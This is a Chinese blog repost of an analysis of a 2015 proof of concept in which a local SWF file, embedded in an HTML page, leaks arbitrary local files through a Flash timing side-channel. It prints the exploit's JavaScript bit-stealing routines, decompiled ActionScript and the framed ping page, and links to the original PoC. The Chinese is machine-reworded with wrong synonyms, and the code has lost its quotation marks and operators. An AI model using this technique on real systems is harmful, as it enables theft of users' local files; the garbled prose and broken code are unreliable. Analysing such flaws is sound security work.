技巧剖析:当地SWF文件可将恣意当地文件泄漏

Flash文件在设计的时候就允许当地的swf文件读取任意的当地文件。Flash Player版本不高于7时,当地SWF文件可与其它SWF文件交互并且能够从任何远程或当地位置加载数据。

原理

在Flash Player 8 和更高版本中,SWF 文件不能连接当地文件系统和 Internet。 但是经由过程旁路通道(timing side-channel),却能够实现提取任意当地文件的内容并传送到收集上(详细说明,可参见[1],[2])。

Google浏览器会阻止(应当是有提示吧)下载“.swf”后缀的文件,来降低对当地文件系统规则的攻击,但是却没有阻止swf文件以差别的文件后缀嵌入进去(poc中,是html和swf文件合并了,所以是嵌入html中[3])。当多个swf文件运行在同一个浏览器,但在差别的frame下,或者差别的tab下时,一次只有一个swf文件能够运行ActionScript脚本。

这也就意味着,当地的swf文件能够经由过程耗时的操作(如直接循环一个段等),使加载的收集上的swf文件的外部接口调用(ExternalInterface call)呈现耽误。这样根据读取的当地文件的信息(如读取一个字节时,bit位为1呈现耽误,bit位为0,不设置耽误),决定是否呈现相应的耽误,收集上的swf文件检测这一耽误,即可获取到读取的文件信息。

当地html文件显然不能直接和收集上的swf文件进行交互,但是当地的html文件能够经由过程frame加载收集上的swf文件。

POC分析

原作者提供的poc分析 ([4],[5]),打开后发现,winhex一看,果断嵌入了swf文件(提供的poc代码中没有这个swf文件,如图1),偏移0xd65后的内容为html文件的内容:

 

0xD65后的内容极为html文件的内容。

看了下作者html中的代码:

/* check the response time of flash */         function ping(cb) {         var l;         window.addEventListener(,message,, l = function(e) {         window.removeEventListener(,message,, l);         //console.log(,got delay ,+e.data.delay)         cb(e.data.delay);         });         document.getElementById(,ifr,).contentWindow.postMessage(,ping,, ,*,);         }                  /* steal one bit */         function getbit(path, char, mask, cb) {         path = encodeURIComponent(path);         document.getElementById(,div,).innerHTML =         embed type=application/x-shockwave-flash src=? flashvars="path=,+path+,&char=,+char+,&mask=,+mask+,">,;//这个地方应当就是[3]提及的那个bug,src换位当地的地址后,poc没能成功读取当地文件内容//作者将当地的swf文件和html文件合并在一起了,path为文件路径         setTimeout(function() {         ping(function(res) {         setTimeout(function() {         cb(res > 100);//根据耽误得到bit位的值         }, 500);         });         }, 200);         }                  /* steal one byte */         function getbyte(path, char, cb) {          var byte = 0;         var mask = 1;         function getbyte_() {         //console.log(,getbyte_ mask=,+mask)         getbit(path, char, mask, function(is_set) {//根据mask的那一bit为1,决定读取char中的某一bit位         //console.log(,mask=,+mask+, set=,+is_set);         if (is_set) byte |= mask;if (mask == 0x80) return cb(String.fromCharCode(byte));      mask  1;      getbyte_();    });    /* steal an entire file */function run() {  var path = document.getElementById(,path,).value;  console.log(,path=,+path)  var i = 0;  var text = ,,;  function run_() {//其实这里应当有个判断文件长度的,当然应当由swf文件把文件长度信息返回回来    getbyte(path, i, function(char) {      console.log(,got char: ,+char)      text += char;      i++;      document.getElementById(,out,).innerText = text;      run_();    });  }  run_();}

从作者给的html文件中提前swf后反,反后在swf脚本下有class_writer这一项:

里面的主要两个函数的代码:

public static function completeHandler(arg1:flash.events.Event):void        {            var loc1:*=0;            if ((Writer.loader.data.charCodeAt(Writer.char) & Writer.mask) != 0)             {//该bit位为1则循环,因此会呈现耽误                loc1 = flash.utils.getTimer() + 400;                do                 {                }                while (flash.utils.getTimer()  loc1);            }            return;        }         public static function main():void        {            Writer.timer = new haxe.Timer(1);            Writer.timer.run = function ():void            {                var loc1:*;                var loc2:*=null;                var loc3:*=undefined as null;                var loc4:*=undefined as null;                if (flash.Lib.current.stage != null)                 {                    false;                }                if (false)                 {                    Writer.timer.stop();                    loc2 = flash.Lib.current.loaderInfo.parameters;                    Writer.path = loc2.path;//文件路径                    Writer.char = Std.parseInt(loc2.char);//获取哪一字节的数据                    Writer.mask = Std.parseInt(loc2.mask);//与之按位与,可确定获取的bit位的值                    loc3 = new flash.net.URLRequest(Writer.path);                    Writer.loader = new flash.net.URLLoader();                    Writer.loader.addEventListener(flash.events.Event.COMPLETE, Writer.completeHandler);                }                return;            }            return;        }

Frame中嵌入的html文件的代码:

embed id=a src=ping.swf AllowScriptAccess=always>script>  window.addEventListener(,message,, function(e) {    var t1 = Date.now();    document.getElementById(,a,).ping();    var t2 = Date.now();    parent.postMessage({delay:t2-t1}, ,*,);//计算收集上的swf文件相应的耽误  });script>

作者poc google浏览器下运行效果:

相关资料

[1]:https://help.adobe.com/zh_CN/AS2LCR/Flash_10.0/help.html?content=00000456.html

[2]:https://help.adobe.com/zh_CN/AS2LCR/Flash_10.0/help.html?content=00000462.html#164081

[3]: https://code.google.com/p/chromium/issues/detail?id=487475(无奈翻墙了提示我不能查看)

[4]https://var.thejh.net/flash_HigNabIalOt6/download.html(原作者的poc)

[5]:https://var.thejh.net/flash_local_poc.zip(原作者的poc 代码)

[6]:https://seclists.org/fulldisclosure/2015/May/122

【编辑推荐】

【责任编辑: TEL:(010)68476606】

转载自:https://netsecurity.51cto.com/art/201506/478825.htm

声明: 除非转自他站(如有侵权,请联系处理)外,本文采用 BY-NC-SA 协议进行授权 | 智乐兔
转载请注明:转自《技巧剖析:当地SWF文件可将恣意当地文件泄漏
本文地址:https://www.zhiletu.com/archives-4449.html
关注公众号:智乐兔

赞赏

wechat pay微信赞赏alipay pay支付宝赞赏

上一篇
下一篇

相关文章

在线留言

你必须 登录后 才能留言!

在线客服
在线客服 X

售前: 点击这里给我发消息
售后: 点击这里给我发消息

智乐兔官微